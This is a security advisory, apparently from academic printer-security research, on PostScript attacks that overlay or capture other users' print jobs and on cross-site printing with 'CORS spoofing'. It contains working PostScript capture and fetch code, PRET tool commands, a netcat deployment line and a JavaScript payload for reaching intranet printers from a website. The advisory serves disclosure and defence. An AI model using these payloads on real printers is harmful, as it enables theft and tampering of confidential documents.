TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 1 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
manipulating and obtaining documents printed by other users, which can
be accomplished by infecting the printer with PostScript malware. This
vulnerability has presumably been present in *every PostScript printer*
since 32 years as solely legitimate PostScript language constructs are
abused. The attack can be performed by anyone who can print, for example
through USB or network. It can even be carried out by a malicious
website, using advanced cross-site printing techniques in combination
with a novel technique we call `CORS spoofing' (see `Cross-Site Printing
and CORS Spoofing' section).

==============[ Print Job Manipulation and Disclosure ]===============

-------------------------[ Affected Devices ]-------------------------

Various printers are likely to be affected as the vulnerability is based
on PostScript, a generic language supported by most laser printers
(except for Brother based devices which use an incompatible PostScript
clone named `Br-Script'). The vulnerability has been verfied for the
devices listed below:

- HP LaserJet 1200 (Firmware version: M.22.09)
- HP LaserJet 4200N (Firmware version: 20050602)
- HP LaserJet 4250N (Firmware version: 20150130)
- HP LaserJet P2015dn (Firmware version: 20070221)
- HP LaserJet M2727nfs (Firmware version: 20140702)
- HP LaserJet 3392 AiO (Firmware version: 20120925)
- HP Color LaserJet CP1515n (Firmware version: 20120110)
- Lexmark X264dn (Firmware version: NR.APS.N645)
- Lexmark E360dn (Firmware version: NR.APS.N645)
- Lexmark C736dn (Firmware version: NR.APS.N644)
- Dell 5130cdn (Firmware version: 201402240935)
- Dell 1720n (Firmware version: NM.NA.N099)
- Dell 3110cn (Firmware version: 200707111148)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

By redefining, the `showpage' operator which is contained in every
PostScript document to print the current page, an attacker can hook in
there and execute her our own PostScript code. Long term redefinition
(until the device is restarted) is possible by prepending the
`startjob'/`exitserver' operators. This PostScript feature allows an
attacker to overlay all pages to be printed with a custom EPS file. It
can be used to play pranks like putting `hax0r slogans' on all sheets a
but also for legitimate tasks such as creating letterheads. Obviously,
such an approach can only be successful if PostScript is used as printer
driver. Example code is given below.

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% DRAW A SMILEY ON ALL FURTHER PRINT JOBS %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
serverdict begin 0 exitserver
currentdict /showpage_real known false eq
{/showpage_real systemdict /showpage get def} if
/showpage {save /showpage {} bind def
[... put arbitrary EPS file here ...]
restore showpage_real} def
----------------------------------------------------------------------

With the capability to hook into arbitrary PostScript operators it is
possible to manipulate and access foreign print jobs. To parse the
actual datastream send to the printer, incoming documents can be read
line-by-line by accessing the PostScript %lineedit special file and
saved into permanent dictionaries which can later be accessed by the
attacker. To hook into at the very start of a document to be captured,
the `BeginPage' system parameter can be abused, which is executed at the
beginning of every PostScript job. In our proof-of-concept version
however, the attack is still dependend on a fixed structure for the
first PostScript operators as provived by CUPS. Example code to capture
arbitrary documents printed with CUPS (using the PostScript printer)
driver is shown below. It can be deployed to the printer using netcat
(`nc printer 9100'). Note that the stored document will not be printed
anymore. A more advanced version which overcomes this drawback has been
implemented in the PRET software (see `Proof of concept' section).

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% CAPTURE FURTHER PRINT JOBS %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
serverdict begin 0 exitserver
/permanent {/currentfile {serverdict begin 0 exitserver} def} def
permanent /filter {
  /strcat {exch dup length 2 index length add string dup
  dup 4 2 roll copy length 4 -1 roll putinterval} def
  /rndname (job_) rand 16 string cvs strcat (.ps) strcat def
  %--------------------------------------------------------------
  false echo                           % no interpreter slowdown
  /newjob true def                     % make sure to set new job
  currentdict /currentfile undef       % reset hooked operator
  /max 40000 def                       % maximum dict/array size
  /slots max array def                 % (re-)define slots array
  /counter 2 dict def                  % slot and line counter
  counter (slot) 0 put                 % initialize slot counter
  counter (line) 0 put                 % initialize line counter
  (capturedict) where {pop}            % print jobs are saved here
  {/capturedict max dict def} ifelse   % define capture dictionary
  capturedict rndname slots put        % assign slots to jobname
  /slotnum {counter (slot) get} def    % get current slot counter
  /linenum {counter (line) get} def    % get current line counter
  %--------------------------------------------------------------
  /capture {
    linenum 0 eq {                     % start of current slot
      /lines max array def             % (re-)define lines array
      slots slotnum lines put          % assign to current slot
    } if
    dup lines exch linenum exch put    % add current to lines
    counter (line) linenum 1 add put   % increment linecounter
    linenum max eq {                   % slotsize limit reached
      counter (slot) linenum 1 add put % increment slotcounter
      counter (line) 0 put             % reset line counter
    } if
  } def
  % - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  { newjob {(%!\ncurrentfile /ASCII85Decode filter ) capture
    pop /newjob false def} if (%lineedit) (r) file
    dup bytesavailable string readstring pop capture pop
  } loop
} def
----------------------------------------------------------------------

After a while, the attacker can come back and list captured jobs:

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% LIST CAPTURED PRINT JOBS %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
(capturedict) where {(Captured jobs:\n) print capturedict
{exch ==} forall}{(No jobs captured) print} ifelse flush

----------------------------------------------------------------------

The captured PostScript file (randomly) named 'job_16807.ps' can be
downloaded by the attacker like this:

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% FETCH CAPTURED PRINT JOBS %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/str 65535 string def capturedict /job_16807.ps get {dup null
ne {{dup null ne {str cvs print} if} forall} if} forall flush
----------------------------------------------------------------------

These are actually not security bugs in the printers nor in CUPS but
legitimate features of the PostScript language. However the impact is
especially relevant to printing devices.

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. The attack to manipulate foreign
print jobs can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> overlay overlays/smiley.eps
printer:/> exit

Now, print an arbitrary document using PostScript as printer driver
(make sure PRET is disconnected to not block the printing channel). You
should see a smiley overlayed on every page. To capture print jobs, use
PRET like this:

$ ./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.

printer:/> capture
Print job operations:  capture <operation>
  capture start   - Record future print jobs.
  capture stop    - End capturing print jobs.
  capture list    - Show captured print jobs.
  capture fetch   - Save captured print jobs.
  capture print   - Reprint saved print jobs.
printer:/> capture start
Future print jobs will be captured in memory!
printer:/> exit

Now, print arbitrary documents with CUPS using PostScript as printer
driver (again, make sure PRET is disconnected to not block the printing
channel). Afterwards, you can list, fetch or reprint captured documents:

$ ./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> capture list
Free virtual memory: 16.6M | Limit to capture:  5.0M
date          size  user           jobname                 creator

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Jan 25 18:38  3.1M  -              -                       -

Jan 25 18:40  170K  -              -                       -

printer:/> capture fetch
Receiving capture/printer/690782792
3239748 bytes received.
Receiving capture/printer/690646210
174037 bytes received.
printer:/> capture print
printing...
printing...
2 jobs reprinted
printer:/> capture stop
Stopping job capture, deleting recorded jobs

-----------------------[ Further Information ]------------------------

Information on this bug/feature of PostScript can be found at:
http://hacking-printers.net/wiki/index.php/Print_job_manipulation
http://hacking-printers.net/wiki/index.php/Print_job_retention

==============[ Cross-Site Printing and CORS Spoofing ]===============

As mentioned, this attack can even be performed by a malicious web site
using advanced cross-site printing techniques in combination with a
novel technique we call `CORS spoofing'. The idea of this technique is
discussed below.

Cross-site printing (XSP) attacks empower a web attacker to access the
printer device as demonstrated by Aaron Weaver who used a hidden Iframe
to send HTTP POST requests to port 9100/tcp of a printer within the
victim's internal network. The HTTP header is either printed as plain
text or discarded based on the printer's settings. The POST data however
can contain arbitrary print jobs like PostScript or PJL commands to be
interpreted. In the following, the idea of cross-site printing is
adapted and improved which enables a web attacker to perform most
attacks described in wiki obtaining captured print jobs, using the
victim's web browser acts as a carrier.

Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects to
perform HTTP POST requests to internal printers. A limitation of the
cross-site printing approach discussed so far is that data can only be
send to the device, not received because of the same-origin policy. This
opts out all information disclosure attacks. To bend the restrictions of
the same-origin policy, cross-origin resource sharing (CORS) can be used
a if the web server explicitly allows it by sending a special HTTP
header field. In the scenario of cross-site printing, however, we have
full control of what the requested `web server' a which actually is a
printer RIP accessed over port 9100/tcp a sends back to the browser. By
using PostScript output commands we can simply emulate an HTTP server
running on port 9100/tcp and define our own HTTP header to be responded
a including arbitrary CORS Access-Control-Allow-Origin fields which
instruct the web browser to allow JavaScript access to this resource and
therefore punch a hole into the same-origin policy.

In such an enhanced variant of XSP a combined with CORS spoofing a a web
attacker has full access to the HTTP response which allows her to
extract arbitrary information like captured print jobs from the printer
device. An example JavaScript snipplet is shown below.

----------------------------------------------------------------------
job = "\x1B%-12345X\r\n"
    + "%!\r\n"
    + "(HTTP/1.0 200 OK\\n) print\r\n"
    + "(Server: PostScript HTTPD\\n) print\r\n"
    + "(Access-Control-Allow-Origin: *\\n) print\r\n"
    + "(Connection: close\\n) print\r\n"
    + "(Content-Length: ) print\r\n"
    + "product dup length dup string cvs print\r\n"
    + "(\\n\\n) print\r\n"
    + "print\r\n"
    + "(\\n) print flush\r\n"
    + "\x1B%-12345X\r\n";

var x = new XMLHttpRequest();
x.open("POST", "http://printer:9100");
x.send(job);
x.onreadystatechange = function() {
  if (x.readyState == 4)
    alert(x.responseText);
};
----------------------------------------------------------------------

One major problem of XSP is to find out the correct address or hostname
of the printer. Our approach is to abuse WebRTC which is implemented in
most modern browsers and has the feature to enumerate IP addresses for
local network interfaces. Given the local IP address, XHR objects are
further used to open connections to port 9100/tcp for all 253 remaining
addresses to retrieve the printer product name using PostScript and CORS
spoofing which only takes seconds in our tests. If the printer is on the
same subnet as the victim's host its address can be detected solely
using JavaScript. WebRTC is in development for Safari and supported by
current versions of Firefox, Chrome and Edge. Internet Explorer has no
WebRTC support, but VBScript and Java can likewise be used to leak the
local IP address. If the address of the local interface cannot be
retrieved, we apply an intelligent brute-force approach: We try to
connect to port 80 of the victim's router using XHR objects. For this, a
list of 115 default router addresses from various Internet-accessible
resources was compiled. If a router is accessible, we scan the subnet
for printers as described before.

-------------------------[ Proof of Concept ]-------------------------

A proof-of-concept implementation demonstrating that advanced cross-site
printing attacks are practical and a real-world threat to companies and
institutions is available at http://hacking-printers.net/xsp/. It was
successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet
Explorer 10. It is worth noting that the Tor Browser blocks the attack
because it tries to connect to all addresses a including local ones a
through the Tor network meaning XSP requests never reach the intranet
printer

-----------------------[ Further Information ]------------------------

Information on cross-site printing can be found at:
http://hacking-printers.net/wiki/index.php/Cross-site_printing
https://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf